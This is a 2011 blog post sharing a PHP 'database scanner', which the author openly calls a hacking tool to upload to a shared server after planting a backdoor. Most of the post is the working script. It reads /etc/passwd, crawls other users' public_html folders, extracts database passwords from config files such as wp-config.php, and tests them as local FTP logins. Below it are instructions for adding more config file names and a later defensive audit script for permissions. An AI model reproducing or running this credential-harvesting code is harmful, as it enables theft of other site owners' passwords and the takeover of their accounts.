bugishere

Database Scanner

Posted on: May 22, 2011

Hello. In this post I want to share a PHP script for a database scanner. This application is actually a hacking tool for accessing other websites on the same server. Believe it or not, if you have a target website and have uploaded your backdoor to it, you can upload this application to scan for several types of database configuration on the server. You can also use it to check the security of your own server, and it can reach the FTP accounts of other websites on the same server. OK, this is the script of the database scanner:

<?php
echo “<html>”;
echo “<title>Database Scanner</title><body>”;
set_time_limit(0);
##################
@$passwd=fopen(‘/etc/passwd’,’r’);
if (!$passwd) {
echo “[-] Error : coudn’t read /etc/passwd”;
exit;
}
$path_to_public=array();
$users=array();
$pathtoconf=array();
$i=0;
while(!feof($passwd)) {
$str=fgets($passwd);
if ($i>35) {
$pos=strpos($str,”:”);
$username=substr($str,0,$pos);
$dirz=”/home/$username/public_html/”;
if (($username!=””)) {
if (is_readable($dirz)) {
array_push($users,$username);
array_push($path_to_public,$dirz);
}
}
}
$i++;
}
############################################
echo “<br><br>”;
echo “<textarea name=’main_window’ cols=100 rows=20>”;
echo “[+] Founded “.sizeof($users).” entrys in /etc/passwd\n”;
echo “[+] Founded “.sizeof($path_to_public).” readable public_html directories\n”;
echo “[~] Searching for passwords in config.* files…\n\n”;
foreach ($users as $user) {
$path=”/home/$user/public_html/”;
read_dir($path,$user);
}
echo “\n[+] Done\n”;
function read_dir($path,$username) {
if ($handle = opendir($path)) {
while (false !== ($file = readdir($handle))) {
$fpath=”$path$file”;
if (($file!=’.’) and ($file!=’..’)) {
if (is_readable($fpath)) {
$dr=”$fpath/”;
if (is_dir($dr)) {
read_dir($dr,$username);
}
else {
if (($file==’config.php’) or ($file==’config.inc.php’) or ($file==’db.inc.php’) or ($file==’connect.php’) or ($file==’wp-config.php’) or ($file==’var.php’) or ($file==’configure.php’) or ($file==’db.php’) or ($file==’configuration.php’) or ($file==’cfg.inc.php’) or ($file==’db_connect.php’)) {
$pass=get_pass($fpath);
if ($pass!=”) {
echo “[+] $fpath\n$pass\n”;
ftp_check($username,$pass);
} } } } } } } }
function get_pass($link) {
@$config=fopen($link,’r’);
while(!feof($config)) {
$line=fgets($config);
if (strstr($line,’pass’) or strstr($line,’password’) or strstr($line,’passwd’)) {
if (strrpos($line,'”‘))
$pass=substr($line,(strpos($line,’=’)+3),(strrpos($line,'”‘)-(strpos($line,’=’)+3)));
else
$pass=substr($line,(strpos($line,’=’)+3),(strrpos($line,”‘”)-(strpos($line,’=’)+3)));
return $pass;
} } }
function ftp_check($login,$pass) {
@$ftp=ftp_connect(‘127.0.0.1’);
if ($ftp) {
@$res=ftp_login($ftp,$login,$pass);
if ($res) {
echo ‘[FTP] ‘.$login.’:’.$pass.”  Success\n”;
}
else ftp_quit($ftp);
}}
echo “</textarea><br>”;
echo “</body></html>”;
?>

I hope the PHP script above isn't used for cyber crime, and the writer does not take responsibility for misuse of this application. It is only for testing your own server, not for exploiting a server. OK, I am going to explain the pieces of the script above.

1. This application scans the server's /home/username/public_html directories:

$dirz=”/home/$username/public_html/”;

$path=”/home/$user/public_html/”;

2. This application only detects the database configuration files of some CMS platforms. If you want to detect another platform, add its configuration file (the file that connects the CMS to its database) to this condition:

if (($file==’config.php’) or ($file==’config.inc.php’) or ($file==’db.inc.php’) or ($file==’connect.php’) or ($file==’wp-config.php’) or ($file==’var.php’) or ($file==’configure.php’) or ($file==’db.php’) or ($file==’configuration.php’) or ($file==’cfg.inc.php’) or ($file==’db_connect.php’))

3. This application runs on a Linux server where the client websites are located under the /home directory.
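For administrators, the conditions this script relies on can be audited directly. The following is an added example, not part of the original post: it reports public_html directories that other accounts can list and config files (the same file names as above) that are world-readable. The function names are hypothetical, and the /home/<user>/public_html layout is the one the post assumes.

```shell
#!/bin/sh
# Added example (not from the original post): audit for the file permissions
# the scanner above depends on. Function names are hypothetical.
# Usage: world_listable_docroots /home ; world_readable_configs /home

# Same file names the scanner looks for.
CONFIG_NAMES="config.php config.inc.php db.inc.php connect.php wp-config.php var.php configure.php db.php configuration.php cfg.inc.php db_connect.php"

# Print <root>/<user>/public_html directories whose "other" read bit is set,
# i.e. directories any local account can list.
world_listable_docroots() {
    root=${1:-/home}
    for docroot in "$root"/*/public_html; do
        [ -d "$docroot" ] || continue
        # -prune: test the directory itself, do not descend into it
        find "$docroot" -prune -type d -perm -004 -print
    done
}

# Print config files under each public_html that are readable by "other".
world_readable_configs() {
    root=${1:-/home}
    # Build the find expression: -name a -o -name b -o ...
    set --
    for n in $CONFIG_NAMES; do
        if [ $# -gt 0 ]; then
            set -- "$@" -o
        fi
        set -- "$@" -name "$n"
    done
    for docroot in "$root"/*/public_html; do
        [ -d "$docroot" ] || continue
        find "$docroot" -type f \( "$@" \) -perm -004 -print
    done
}
```

Files reported by world_readable_configs should be readable only by their owner (and, where the hosting setup needs it, the web server's group). The FTP check in the script succeeds only when an account's database password is also its FTP password, so those credentials should differ.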

Bye.😀

12 Responses to "Database Scanner"


[…] don’t know, why my old database scanner can’t be used now. So I’m going to share my other database scanner used to […]


Great work thanks
